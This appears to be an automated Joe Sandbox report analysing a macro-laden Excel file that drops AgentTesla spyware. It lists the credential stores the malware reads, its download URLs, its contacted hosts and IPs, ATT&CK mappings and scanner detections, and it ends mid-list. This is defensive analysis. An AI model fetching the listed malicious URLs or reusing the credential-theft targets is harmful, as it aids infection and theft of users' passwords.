                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tNDFx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tNDFx.exe PID: 2484, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000000B.00000002.2350984768.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351624860.000000000221A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2134883837.0000000006A8F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tNDFx.exe PID: 2484, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: tNDFx.exe PID: 2288, type: MEMORY
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6a8f2b8.17.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6ac52d8.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.tNDFx.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6ac52d8.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.tNDFx.exe.6a8f2b8.17.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1Input Capture11System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Scripting22Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsCommand and Scripting Interpreter11Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information11NTDSSecurity Software Discovery421Distributed Component Object ModelInput Capture11Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell2Network Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsVirtualization/Sandbox Evasion24SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol22Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion24DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 372951 Sample: MV TRIADES.xlsm Startdate: 22/03/2021 Architecture: WINDOWS Score: 100 45 Found malware configuration 2->45 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 9 other signatures 2->51 10 EXCEL.EXE 57 15 2->10         started        process3 file4 37 C:\Users\user\Desktop\~$MV TRIADES.xlsm, data 10->37 dropped 13 cmd.exe 10->13         started        process5 signatures6 71 Encrypted powershell cmdline option found 13->71 16 powershell.exe 12 7 13->16         started        process7 dnsIp8 39 specfloors.net 107.180.99.252, 49165, 80 AS-26496-GO-DADDY-COM-LLCUS United States 16->39 35 C:\Users\user\AppData\Roaming\tNDFx.exe, PE32 16->35 dropped 53 Powershell drops PE file 16->53 21 tNDFx.exe 12 8 16->21         started        file9 signatures10 process11 dnsIp12 41 liverpoolsupporters9.com 172.67.176.78, 49167, 80 CLOUDFLARENETUS United States 21->41 55 Multi AV Scanner detection for dropped file 21->55 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 21->57 59 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 21->59 61 3 other signatures 21->61 25 tNDFx.exe 2 21->25         started        29 cmd.exe 21->29         started        31 tNDFx.exe 21->31         started        signatures13 process14 dnsIp15 43 smtp.jiratane.com 198.54.116.63, 49168, 587 NAMECHEAP-NETUS United States 25->43 63 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 25->63 65 Tries to steal Mail credentials (via file access) 25->65 67 Tries to harvest and steal ftp login credentials 25->67 69 2 other signatures 25->69 33 timeout.exe 29->33         started        signatures16 process17

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      MV TRIADES.xlsm45%VirustotalBrowse
                      MV TRIADES.xlsm43%ReversingLabsScript-Macro.Downloader.NetWired
                      MV TRIADES.xlsm100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\tNDFx.exe28%ReversingLabsWin32.Trojan.Wacatac

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      11.2.tNDFx.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      specfloors.net0%VirustotalBrowse
                      smtp.jiratane.com4%VirustotalBrowse
                      liverpoolsupporters9.com1%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg0%Avira URL Cloudsafe
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://smtp.jiratane.com0%Avira URL Cloudsafe
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/0%Avira URL Cloudsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-100%Avira URL Cloudmalware
                      https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-199458160%Avira URL Cloudsafe
                      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp0%Avira URL Cloudsafe
                      http://crl3.dJ0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%Avira URL Cloudsafe
                      http://specfloors.net/dev/income100%Avira URL Cloudmalware
                      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
                      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg0%Avira URL Cloudsafe
                      http://specfloors.net/dev/income.exe100%Avira URL Cloudmalware
                      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
                      http://jEOkvI.com0%Avira URL Cloudsafe
                      http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.html100%Avira URL Cloudmalware
                      http://specfloors.net/dev/income.exePE100%Avira URL Cloudmalware
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://i2-prod.live0%Avira URL Cloudsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      https://oMAWpB8PlZYBRN.org0%Avira URL Cloudsafe
                      http://liverpoolsupporters9.com100%Avira URL Cloudmalware
                      https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-1995900%Avira URL Cloudsafe
                      http://specfloors.net100%Avira URL Cloudmalware
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      https://www.liverpool.com/all-about/steven-gerrard0%Avira URL Cloudsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe
                      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      specfloors.net
                      		107.180.99.252
                      		truefalseunknown
                      smtp.jiratane.com
                      		198.54.116.63
                      		truetrueunknown
                      liverpoolsupporters9.com
                      		172.67.176.78
                      		truefalseunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://specfloors.net/dev/income.exetrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.htmltrue
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://DynDns.comDynDNStNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpgtNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpgtNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.entrust.net/server1.crl0tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                        		high
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hatNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://ocsp.entrust.net03tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://smtp.jiratane.comtNDFx.exe, 0000000B.00000002.2351747321.00000000022D6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpgtNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://www.liverpool.com/liverpool-fc-news/features/tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diginotar.nl/cps/pkioverheid0tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-tNDFx.exe, 00000006.00000002.2129469657.0000000002291000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jptNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl3.dJtNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000004.00000002.2105102393.00000000024C0000.00000002.00000001.sdmp, tNDFx.exe, 00000006.00000002.2133629732.0000000005190000.00000002.00000001.sdmp, tNDFx.exe, 0000000B.00000002.2353416224.0000000005DC0000.00000002.00000001.sdmpfalse
                          		high
                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000004.00000002.2103160491.000000000035E000.00000004.00000020.sdmpfalse
                            		high
                            https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jptNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://specfloors.net/dev/incomepowershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpgtNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://jEOkvI.comtNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://specfloors.net/dev/income.exePEpowershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.piriform.com/ccleanerpowershell.exe, 00000004.00000002.2103160491.000000000035E000.00000004.00000020.sdmpfalse
                              		high
                              https://api.ipify.org%GETMozilla/5.0tNDFx.exe, 0000000B.00000002.2351562307.0000000002191000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		low
                              https://i2-prod.livetNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.%s.comPApowershell.exe, 00000004.00000002.2105102393.00000000024C0000.00000002.00000001.sdmp, tNDFx.exe, 00000006.00000002.2133629732.0000000005190000.00000002.00000001.sdmp, tNDFx.exe, 0000000B.00000002.2353416224.0000000005DC0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		low
                              https://oMAWpB8PlZYBRN.orgtNDFx.exe, 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://liverpoolsupporters9.comtNDFx.exe, 00000006.00000002.2129469657.0000000002291000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://specfloors.netpowershell.exe, 00000004.00000002.2113001292.000000000357D000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://ocsp.entrust.net0DtNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://www.liverpool.com/all-about/steven-gerrardtNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametNDFx.exe, 00000006.00000002.2129469657.0000000002291000.00000004.00000001.sdmpfalse
                                		high
                                https://secure.comodo.com/CPS0tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                                  		high
                                  https://api.ipify.org%tNDFx.exe, 0000000B.00000002.2351624860.000000000221A000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		low
                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziptNDFx.exe, 00000006.00000002.2134883837.0000000006A8F000.00000004.00000001.sdmp, tNDFx.exe, 0000000B.00000002.2350984768.0000000000402000.00000040.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://servername/isapibackend.dlltNDFx.exe, 00000006.00000002.2134297073.0000000005E20000.00000002.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://crl.entrust.net/2048ca.crl0tNDFx.exe, 00000006.00000002.2129288401.0000000000B58000.00000004.00000020.sdmpfalse
                                    		high
                                    https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-tNDFx.exe, 00000006.00000002.2129490632.00000000022C0000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    172.67.176.78
                                    		liverpoolsupporters9.comUnited States
                                    		13335CLOUDFLARENETUSfalse
                                    198.54.116.63
                                    		smtp.jiratane.comUnited States
                                    		22612NAMECHEAP-NETUStrue
                                    107.180.99.252
                                    		specfloors.netUnited States
                                    		26496AS-26496-GO-DADDY-COM-LLCUSfalse

                                    General Information

                                    Joe Sandbox Version:31.0.0 Emerald
                                    Analysis ID:372951
                                    Start date:22.03.2021
                                    Start time:15:35:13
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 17m 16s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:MV TRIADES.xlsm
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:13
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • GSI enabled (VBA)
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.expl.evad.winXLSM@15/10@3/3
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 2% (good quality ratio 2%)
                                    • Quality average: 84.3%
                                    • Quality standard deviation: 21%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 91
                                    • Number of non-executed functions: 5
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .xlsm
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    Show All
                                    • Max analysis timeout: 720s exceeded, the analysis took too long
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 8.253.207.121, 8.238.28.254, 8.238.85.254, 8.253.207.120, 8.238.30.254
                                    • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    15:35:41API Interceptor61x Sleep call for process: powershell.exe modified
                                    15:35:48API Interceptor1076x Sleep call for process: tNDFx.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    172.67.176.78IMG_1024_363_17.pdf.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-AF5734FDC5BC02E3380E1236CC01A9AE.html
                                    income.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.html
                                    IMG_50_70_66301.docGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C8A9B590352BD9C6D2E64B3D14C088F9.html
                                    IMG_251_45_013.docGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-4C78BD7CD35DADE3CF28759182F2D653.html
                                    IMG_501_76_1775.docGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-29CD977A7A361AF2606F27C6B01DEE59.html
                                    RFQ.scr.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FB7600CB3A820E62568D666C00820C4A.html
                                    PO350KW30021.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-257ABF51706A44C548CD607ADCB0C1FC.html
                                    mj8ejPVt3a.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2537464CE3227EE44144CDC523917958.html
                                    Po # 6-10331.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C6505A2524A51F40F1680539070223E9.html
                                    4849708PO # RMS0001.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-93D8A0A26DFD91C35256956F4B9683F6.html
                                    Drawings_pdf.exeGet hashmaliciousBrowse
                                    • liverpoolsupporters9.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-391FD31F547A7FD54F297CDEECE4B7FC.html
                                    ORDER 71902.docGet hashmaliciousBrowse
